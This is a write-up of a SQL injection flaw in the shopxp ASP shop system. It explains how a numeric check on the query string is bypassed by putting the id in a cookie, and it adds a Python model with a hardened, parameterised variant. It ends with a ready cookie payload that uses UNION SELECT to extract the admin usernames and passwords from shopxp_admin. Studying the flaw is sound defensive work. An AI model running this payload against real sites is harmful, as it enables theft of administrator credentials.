Text/My5t3ry
Recently, while helping some friends look over a website, I found it was running shopxp. I went back to the shopxp source code, read through it, and found a number of vulnerabilities. Let's take a look at them. This system uses the early Maple Leaf anti-injection script, which only filters GET parameters and can be bypassed; the bypass itself is not discussed here. Consider
Lines 9-36 of xplistpl.asp:
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="88%"><table cellSpacing=0 cellPadding=0 width=100% align=center border=0>
<tbody>
<tr>
<td width="1" background="img_shopxp/xiao/bgbg.gif"></td>
<td class=B vAlign=top align=left><% If IsNumeric(Request.QueryString("id")) = False Then
Response.Write("<script>alert(""illegal access!"");location.href=""index.asp"";</script>")
Response.End
End If
Dim id
id = Request.QueryString("id")
If Not isinteger(id) Then
' no Response.End here, so execution continues after the alert
Response.Write "<script>alert(""illegal access!"");location.href=""index.asp"";</script>"
End If %>
<table width="100%" align="center" border="0" cellspacing="0" cellpadding="0" class="table-zuoyou" bordercolor="#CCCCCC">
<tr>
<td width="100%" valign="top" bordercolor="#FFFFFF" bgcolor="#FFFFFF" align="center"><table width="100%" border="0" cellspacing="0" cellpadding="4" align="center">
<%
Set rs = Server.CreateObject("adodb.recordset")
' Request("id") reads QueryString, Form and Cookies, not only QueryString
rs.Open "select * from shopxp_product where shopxpptid=" & Request("id"), conn, 1, 3
If rs.RecordCount > 0 Then
spmx = rs("shopxpptname")
End If %>
<tr>
<td colspan="3" background="img_shopxp/class_bg.jpg" height=50><a href=index.asp><%=webname%></a> product comment: <%=spmx%></td>
</tr>
</table>
The code above has a logic flaw. IsNumeric(Request.QueryString("id")) = False is used to decide whether the id that was obtained is a number, and if it is not, execution stops.
However, the id here is read through Request.QueryString. What happens if we do not supply an id in the query string at all? In VBScript, IsNumeric of an Empty value returns True, so the check passes. The following code can be used to verify this:
<%
If IsNumeric(Request.QueryString("id")) = False Then
Response.Write("<script>alert(""illegal access!"");location.href=""index.asp"";</script>")
Response.End
End If
Response.Write("my5t3ry")
%>
Save this as test.asp and open it directly: is my5t3ry printed? If no id is supplied through Request.QueryString,
but an id is supplied through Request.Form or Request.Cookies, the check is bypassed outright. Execution does not stop, and the code proceeds to
the SQL query, which uses Request("id"). Anyone who has learned ASP knows that Request() reads GET, POST and cookie values alike. This is how both the anti-injection filter (which only covers GET) and the IsNumeric check are sidestepped.
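As an added example (constructed for this write-up, not shopxp code), the following Python model shows the mismatch described above: the id is checked in one request collection but read from another. Beside it sits a hardened variant that validates the exact value it uses and binds it as a query parameter. The AspRequest class and its lookup order are a stand-in for the Classic ASP Request object.

```python
"""Model of the xplistpl.asp flaw (constructed example, not shopxp code):
the IsNumeric check reads QueryString("id"), while the SQL string is built
from Request("id"), which in Classic ASP also searches Form and Cookies.
VBScript's IsNumeric(Empty) is True, so a request with no id in the query
string passes the check and a cookie value reaches the query."""
import re
from dataclasses import dataclass, field


@dataclass
class AspRequest:
    """Minimal stand-in for the Classic ASP Request object (constructed)."""
    querystring: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)

    def item(self, name):
        # Request("x") searches QueryString, then Form, then Cookies.
        for collection in (self.querystring, self.form, self.cookies):
            if name in collection:
                return collection[name]
        return ""


def vb_is_numeric(value):
    """Approximates VBScript IsNumeric: a missing key yields Empty -> True."""
    if value is None:
        return True
    return re.fullmatch(r"\s*[-+]?\d+(\.\d+)?\s*", value) is not None


def vulnerable_query(req):
    """Mirrors xplistpl.asp: checks one source, concatenates another."""
    if not vb_is_numeric(req.querystring.get("id")):
        return None  # Response.End: request rejected
    return "select * from shopxp_product where shopxpptid=" + req.item("id")


def hardened_query(req):
    """Read the id from one source only, validate that exact value, and pass
    it as a bound parameter instead of splicing it into the SQL text."""
    raw = req.querystring.get("id")
    if raw is None or not re.fullmatch(r"\d{1,9}", raw):
        return None  # reject missing, non-integer and oversized ids alike
    return ("select * from shopxp_product where shopxpptid=?", (int(raw),))
```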
Exploit:
Open the target site in Firefox and use the NoScript add-on to disable the site's JavaScript.
Then clear the address bar and enter:
javascript:alert(document.cookie="id="+escape("1 union select 1,cstr(adminid)&chr(124)&admin&chr(124)&password,9,0,9,0,1,2,3 from shopxp_admin"));location.href="/xplistpl.asp";
PS: if the product comment is not displayed, the cause is usually a mismatch in the number of columns.